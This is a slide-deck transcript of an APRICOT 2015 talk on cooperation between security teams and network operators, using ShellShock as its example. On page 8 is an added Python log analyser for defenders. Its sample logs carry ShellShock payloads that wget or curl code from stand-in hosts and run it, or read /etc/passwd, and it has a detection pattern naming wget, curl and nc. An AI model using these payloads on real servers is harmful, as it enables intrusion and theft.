Page 1

APRICOT 2015 Security Day

Cooperation between Security Teams and Network Operators:
Actionable Intelligence on ShellShock

Arnold S. Yoon
Information Security Research Consultant, Counter Threat Unit (CTU)
[email protected]

Page 2

2 Dell - Internal Use - Confidential

Classification: //Dell SecureWorks/Confidential - Limited External Distribution:

Agenda

• Cooperation between N/W Operators and Security Teams
• Vulnerability handling
  – Traditional questions
• Challenges and gaps
• ShellShock example
  – Enrichment of OSINT
• Conclusion: Actionable intelligence

Page 3

Traditional Cooperation Model/Cases Between N/W Operators and Security Teams

• Identify a stakeholder
  – Where does this hostile resource (IP/domain) belong to?
  – Who is the attacker?
  – Overload or side work for N/W operations
• Vulnerability in N/W appliances
  – H/W and S/W
  – Management console (software)
• N/W protocol based vulnerability
  – POODLE (SSL 3.0)
• DDoS attacks
  – NTP and DNS reflection/amplification attacks

Page 4

Traditional Questions on a Vulnerability

• Both for Security Teams and Network Operators
  – For all stakeholders
• Questions
  – What is the technical detail of the new vulnerability?
  – Does a technical mitigation or resolution exist?
    › Zero-day vulnerability
    › Mitigation plan
  – What and who is impacted?
    › Impacted products (hardware / software)
    › Scope of impact in the constituency
  – Is there a (successful) exploit or incident case?
    › Exploit activity
    › Associated malware or tools
  – Alternative mitigation plan?
    › Disable the service
    › Actionable intelligence

The CVSS (Common Vulnerability Scoring System) framework is widely adopted to address these questions: its base metrics describe the technical detail (attack vector, complexity, impact) and its temporal metrics capture exploit maturity and remediation level. A CVSS score alone, however, does not tell an operator which of its own assets are exposed; that still has to be established locally.

Page 5

Challenges and Gaps

• Security Teams
  – Vendor dependent
  – Lack of information
    › Identifying the stakeholder
  – Deliverables
    › Vulnerability advisory
    › Link to patches
    › Indicators
• Network Operators
  – Legal issues
    › Client information disclosure
  – Additional workload
  – Mitigation plan
    › Implementing patches on a production N/W
  – Lack of content for indicators
  – Perception of N/W availability

Page 6

Change in Threat Landscape

• N/W providers' involvement in IT services increases
  – Outsourced N/W services, including security
  – Cloud computing (data centers)
• N/W admins are often targeted as an initial attack vector

Page 7

What is ShellShock

• Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

• Attackers exploited Shellshock within hours of the initial disclosure by creating botnets of compromised computers to perform distributed denial-of-service attacks and vulnerability scanning.

Reference: http://en.wikipedia.org/wiki/Shellshock_(software_bug)

Page 8

Enrichment of OSINT

• OSINT
  – List of CVEs
  – List of CPEs
  – (Malicious indicators)
• Enrichment
  – Additional payload or malware
  – Association with a known threat group (TG)
  – Association with known malicious infrastructure
  – Passive DNS records
  – etc.
• Demonstration of a ShellShock investigation
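The following Python script is an added example, not code from this talk or from SecureWorks: it shows what the "enrichment" step above looks like when applied to the ShellShock mechanism described on the previous slide. CGI-style web servers hand request headers to bash as environment variables, and vulnerable bash (CVE-2014-6271) executed whatever followed an exported function definition of the form `() { ... };`, so probes carry that marker in User-Agent, Referer, or the URI. The script scans constructed Apache combined-format log lines for that marker, URL-decodes the request path, and extracts the indicators an operator can act on from the injected command: the scanning source, download URLs, payload-hosting IPs, and the tools invoked. All log lines, addresses (RFC 5737 ranges) and the `evil.example` domain are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed Apache "combined" access-log lines (not real traffic: RFC 5737
# documentation addresses and a reserved example domain). Lines 2-4 each carry
# a ShellShock probe in a different field: User-Agent, Referer, request URI
# (URL-encoded). Line 1 is a benign request that must not be flagged.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:10:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :; }; /usr/bin/wget -O /tmp/x http://203.0.113.5/bot.pl; /usr/bin/perl /tmp/x"
198.51.100.8 - - [25/Sep/2014:10:02:11 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 0 "() { :;}; /usr/bin/curl -o /tmp/a http://evil.example/a.sh" "Mozilla/4.0"
198.51.100.9 - - [25/Sep/2014:10:03:00 +0000] "GET /cgi-bin/env.cgi?%28%29%20%7B%20%3A%3B%7D%3B%20/bin/cat%20/etc/passwd HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [timestamp], "request",
# status, size, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<src_ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# Shape of an exported bash function definition, "() { ... };", followed by the
# trailing text that vulnerable bash (CVE-2014-6271) executed when it imported
# the variable. Whitespace and the function body vary between scanners, hence
# the loose pattern.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<tail>.+)')

URL_RE = re.compile(r'https?://[^\s"\'<>;]+')
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
TOOL_RE = re.compile(r'\b(wget|curl|perl|python|nc|bash)\b')


def parse_line(line):
    """Split one combined-log line into named fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def _field_text(fields, name):
    """Return the decoded text of a field; for the request line, only the URI part."""
    value = fields[name]
    if name == "request":
        parts = value.split(" ")
        value = parts[1] if len(parts) >= 2 else value
    return unquote(value)


def find_probe(fields):
    """Return (field, decoded_text, command_tail) for the first field carrying a probe."""
    for name in ("user_agent", "referer", "request"):
        text = _field_text(fields, name)
        m = SHELLSHOCK_RE.search(text)
        if m:
            return name, text, m.group("tail").strip()
    return None


def enrich(tail):
    """Pull the indicators an operator can act on out of the injected command."""
    return {
        "urls": sorted(set(URL_RE.findall(tail))),
        "ips": sorted(set(IPV4_RE.findall(tail))),
        "tools": sorted(set(TOOL_RE.findall(tail))),
    }


def analyze_log(text):
    """Return one event dict per log line that carries a ShellShock probe."""
    events = []
    for line in text.splitlines():
        fields = parse_line(line)
        if not fields:
            continue
        hit = find_probe(fields)
        if not hit:
            continue
        field, _, tail = hit
        event = {"src_ip": fields["src_ip"], "ts": fields["ts"],
                 "field": field, "payload": tail}
        event.update(enrich(tail))
        events.append(event)
    return events


def collect_indicators(events):
    """Deduplicate indicators across events: scanning sources and payload hosts."""
    out = {"source_ips": set(), "urls": set(), "payload_ips": set()}
    for ev in events:
        out["source_ips"].add(ev["src_ip"])
        out["urls"].update(ev["urls"])
        out["payload_ips"].update(ev["ips"])
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    events = analyze_log(SAMPLE_LOG)
    for ev in events:
        print(f"{ev['ts']} {ev['src_ip']} via {ev['field']}: {ev['payload']}")
    print(collect_indicators(events))
```

The output of `collect_indicators` is the raw material for the enrichment bullets above: the payload URLs and hosting IPs are what you pivot on in passive DNS and known-infrastructure data, while the source IPs are the scanning population to hand to the network operator. A probe in the log only proves that someone tried; whether the host was actually vulnerable has to be confirmed on the host (bash version, and whether the targeted path really invokes bash), which is why the script reports the target field and command rather than declaring a compromise.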

Page 9

Conclusion: Actionable Intelligence

• Vulnerability advisories are not easy to digest or to act on
  – Mostly a lack of content
  – Risk of blocking legitimate services
• Security Teams should start providing more detail
• N/W operators need to focus more on mitigating vulnerabilities at the network level, without forgetting host-based vulnerabilities
• Actionable intelligence promotes coordination and a better mitigation plan in a timely manner